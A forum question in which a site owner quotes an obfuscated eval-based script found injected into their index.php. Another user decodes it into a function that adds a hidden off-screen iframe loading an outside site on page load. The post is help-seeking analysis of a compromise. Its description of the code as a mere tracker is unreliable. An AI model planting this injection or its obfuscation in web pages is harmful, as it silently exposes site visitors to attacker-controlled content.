<script> try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar"; f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92 ,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29 ,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107, 95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36, 105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,1 06,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103 ,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48 ,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105, 37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1 ,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1]; v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5- i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s); </script>
I donβt know what this script does, but yesterday I found this on my index.php webpage, which actually makes the site not displayable.
Is it something dangerous, for example, someone hacked my site or something like that?
Let me know if anyone has any ideas about this.
EDIT: Added Rob W ( not the original poster): the code is messy. Correct the syntax error (your formatting caused a gap of 106 to 1\n06 . Then replace the final e(s) , which is the shortcut for eval(s) with s . Finally, execute the code in the console and you (I did not format anything, this is literal result):
function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://michaelmazur.net/xml.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd;
This script seems to be some kind of tracker. The external page cannot read the cookies of your page, etc. Due to the same limitations of origin policy . This does not guarantee the security of your server because it has been compromised.